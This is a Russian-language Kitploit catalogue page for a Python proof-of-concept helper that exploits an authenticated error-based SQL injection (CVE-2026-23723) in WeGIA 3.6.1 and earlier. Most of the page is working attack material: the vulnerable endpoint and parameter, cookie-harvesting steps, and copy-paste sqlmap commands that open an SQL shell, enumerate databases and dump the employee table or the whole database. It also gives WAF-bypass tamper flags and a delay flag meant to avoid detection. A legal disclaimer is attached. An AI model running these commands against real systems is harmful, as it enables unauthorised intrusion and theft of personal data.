Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-23723-POC — Это лёгкий вспомогательный скрипт на Python, предназначенный для автоматизации генерации PoC-файлов, совместимых с sqlmap, для аутентифицированной уязвимости SQL-инъекции на основе ошибок в WeGIA (≤ 3.6.1), идентифицированной как GHSA-xfmp-2hf9-gfjp. | Kitploit
Инструменты/GitHubGitHub/ch35h1r3c47/cve-2026-23723-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubch35h1r3c47/cve-2026-23723-poc

CVE-2026-23723-POC

Это лёгкий вспомогательный скрипт на Python, предназначенный для автоматизации генерации PoC-файлов, совместимых с sqlmap, для аутентифицированной уязвимости SQL-инъекции на основе ошибок в WeGIA (≤ 3.6.1), идентифицированной как GHSA-xfmp-2hf9-gfjp.

Репозиторий
316 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-23723 PoC — Хелпер для эксплуатации аутентифицированной SQL-инъекции в WeGIA

Аутентифицированная error-based SQL-инъекция в WeGIA ≤ 3.6.1
GHSA-xfmp-2hf9-gfjp | Официальный бюллетень

Оригинальный автор PoC / Репортёр: ViniCastro2001 Опубликовано GHSA: nilsonLazarin (мейнтейнер проекта)

Этот лёгкий Python-скрипт автоматизирует:

  • Вход в систему WeGIA с использованием предоставленных учётных данных
  • Извлечение валидной PHP-сессионной cookie
  • Генерацию файла запроса, совместимого с sqlmap (точка инъекции помечена как id_memorando=1*)
  • Вывод готовых к запуску команд sqlmap для перечисления данных, интерактивной оболочки и дампа базы данных

Возможности

  • Перебирает несколько распространённых путей входа и имён полей форм для лучшей совместимости
  • Генерирует файл запроса для sqlmap (.req)
  • Предоставляет команды sqlmap для копирования и вставки:
    • Интерактивная оболочка в стиле MySQL (--sql-shell)
    • Перечисление баз данных / таблиц
    • Целевой дамп таблицы или полный дамп базы данных

Требования

  • Python 3.x
  • Библиотека requests (в большинстве сред для пентеста она уже установлена)
  • sqlmap установлен и доступен в PATH

Установка

root@kitploit:~
git clone https://github.com/Ch35h1r3c47/CVE-2026-23723-POC.git
cd CVE-2026-23723-POC

Использование

root@kitploit:~
# Рекомендуется: интерактивный запрос пароля
python CVE-2026-23723.py --url http://target.com -u admin

# Указать пароль напрямую
python CVE-2026-23723.py --url http://target.com -u admin -p wegia

# Пользовательский файл вывода
python CVE-2026-23723.py --url http://target.com -u admin -p wegia --output custom.req

После успешного выполнения скрипт:

Попытается выполнить вход Сгенерирует wegia_sqlmap.req (или ваш пользовательский файл) Отобразит готовые к использованию команды sqlmap

Пример сгенерированных команд:

root@kitploit:~
# 1. Интерактивная оболочка в стиле MySQL (рекомендуется)
sqlmap -r wegia_sqlmap.req --sql-shell --batch --dbms=mariadb

# 2. Показать текущую и все базы данных
sqlmap -r wegia_sqlmap.req --current-db --dbs --batch

# 3. Список таблиц в базе данных wegia
sqlmap -r wegia_sqlmap.req -D wegia --tables --batch

# 4. Дамп конкретной таблицы (пример: funcionario)
sqlmap -r wegia_sqlmap.req -D wegia -T funcionario --dump --threads=2 --batch

# 5. Дамп всей базы данных wegia (осторожно!)
sqlmap -r wegia_sqlmap.req -D wegia --dump-all --threads=3 --batch --output-dir=./dump
Дополнительные флаги sqlmap:

--proxy=http://127.0.0.1:8080 (через Burp/ZAP)
--tamper=space2comment,randomcase (базовый обход WAF)
--delay=1 (замедлить запросы, чтобы избежать обнаружения)

Если автоматический вход не сработал Выполните вход вручную через браузер → скопируйте полный заголовок Cookie → запустите sqlmap напрямую:

root@kitploit:~
sqlmap -u "http://target.com/controle/control.php?nomeClasse=Atendido_ocorrenciaControle&metodo=listarTodosComAnexo&id_memorando=*" \
  --cookie="PHPSESSID=xxxxxxxx; other_cookie=yyy" \
  --sql-shell --batch

Правовое предупреждение Данный PoC предоставлен исключительно для образовательных целей и авторизованного тестирования на проникновение. Несанкционированное использование против любой системы незаконно и запрещено. Автор и участники не несут ответственности за неправомерное использование или любой причинённый ущерб. Ссылки

GHSA-xfmp-2hf9-gfjp CVE-2026-23723

Скачать инструмент